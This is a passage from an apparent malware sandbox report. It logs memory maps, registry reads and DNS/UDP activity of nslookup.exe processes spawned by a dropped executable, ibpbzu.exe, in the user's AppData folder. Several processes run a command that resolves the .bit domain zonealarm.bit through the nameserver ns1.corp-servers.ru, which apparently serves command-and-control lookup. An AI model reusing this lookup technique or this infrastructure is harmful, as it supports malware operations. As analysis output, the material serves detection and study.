wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007eb50000 0x7eb50000 0x7ec4ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ec50000 0x7ec50000 0x7ec72fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 106 bytes
Total Data Received 772 bytes
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #22: nslookup.exe
8 25
»
Information Value
ID #22
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:04:44, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:01:02
OS Process Information
»
Information Value
PID 0x1100
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 1010
0x BA8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000500000 0x00500000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000500000 0x00500000 0x0050ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x00513fff Private Memory Readable, Writable True False False -
private_0x0000000000520000 0x00520000 0x00521fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x00521fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000530000 0x00530000 0x00547fff Pagefile Backed Memory Readable True False False -
private_0x0000000000550000 0x00550000 0x0058ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x005cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x005d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x005e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000005f0000 0x005f0000 0x005f0fff Private Memory Readable, Writable True False False -
private_0x0000000000600000 0x00600000 0x007fffff Private Memory Readable, Writable True False False -
locale.nls 0x00800000 0x008c4fff Memory Mapped File Readable False False False -
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x028effff Pagefile Backed Memory - True False False -
private_0x00000000028f0000 0x028f0000 0x0292ffff Private Memory Readable, Writable True False False -
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002970000 0x02970000 0x02970fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x02983fff Private Memory Readable, Writable True False False -
private_0x0000000002a20000 0x02a20000 0x02a2ffff Private Memory Readable, Writable True False False -
private_0x0000000002b00000 0x02b00000 0x02b0ffff Private Memory Readable, Writable True False False -
private_0x0000000002bd0000 0x02bd0000 0x02ccffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002cd0000 0x02cd0000 0x02e0cfff Pagefile Backed Memory Readable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f4a0000 0x7f4a0000 0x7f59ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f5a0000 0x7f5a0000 0x7f5c2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (5)
»
Information Value
Total Data Sent 168 bytes
Total Data Received 1.32 KB
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #4
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #5
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #24: nslookup.exe
8 16
»
Information Value
ID #24
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:00, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:46
OS Process Information
»
Information Value
PID 0x1120
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 1134
0x 9CC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000000a0000 0x000a0000 0x000bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000affff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b3fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c1fff Private Memory Readable, Writable True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000e7fff Pagefile Backed Memory Readable True False False -
private_0x00000000000f0000 0x000f0000 0x0012ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00173fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00180fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x001f3fff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
locale.nls 0x00400000 0x004c4fff Memory Mapped File Readable False False False -
private_0x00000000004d0000 0x004d0000 0x0050ffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x005bffff Private Memory Readable, Writable True False False -
private_0x0000000000660000 0x00660000 0x0066ffff Private Memory Readable, Writable True False False -
private_0x0000000000790000 0x00790000 0x0088ffff Private Memory Readable, Writable True False False -
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x028effff Pagefile Backed Memory - True False False -
pagefile_0x00000000028f0000 0x028f0000 0x02a2cfff Pagefile Backed Memory Readable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007e5f0000 0x7e5f0000 0x7e6effff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007e6f0000 0x7e6f0000 0x7e712fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 189.75.183.21, 94.183.71.48, 89.203.10.56, 94.249.60.127 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 106 bytes
Total Data Received 772 bytes
Contacted Host Count 1
Contacted Hosts 189.75.183.21:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 189.75.183.21
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 189.75.183.21, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #26: nslookup.exe
8 25
»
Information Value
ID #26
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:13, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:33
OS Process Information
»
Information Value
PID 0x113c
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 112C
0x AB8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000004d0000 0x004d0000 0x004effff Private Memory Readable, Writable True False False -
pagefile_0x00000000004d0000 0x004d0000 0x004dffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x004e3fff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x004f1fff Private Memory Readable, Writable True False False -
pagefile_0x00000000004f0000 0x004f0000 0x004f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000500000 0x00500000 0x00517fff Pagefile Backed Memory Readable True False False -
private_0x0000000000520000 0x00520000 0x0055ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x0059ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005a0000 0x005a0000 0x005a3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000005b0000 0x005b0000 0x005b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000005c0000 0x005c0000 0x005c0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x005d0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000005e0000 0x005e0000 0x005e3fff Private Memory Readable, Writable True False False -
private_0x0000000000600000 0x00600000 0x007fffff Private Memory Readable, Writable True False False -
locale.nls 0x00800000 0x008c4fff Memory Mapped File Readable False False False -
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x028effff Pagefile Backed Memory - True False False -
private_0x00000000028f0000 0x028f0000 0x0292ffff Private Memory Readable, Writable True False False -
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002970000 0x02970000 0x02aacfff Pagefile Backed Memory Readable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02acffff Private Memory Readable, Writable True False False -
private_0x0000000002c40000 0x02c40000 0x02c4ffff Private Memory Readable, Writable True False False -
private_0x0000000002cc0000 0x02cc0000 0x02dbffff Private Memory Readable, Writable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
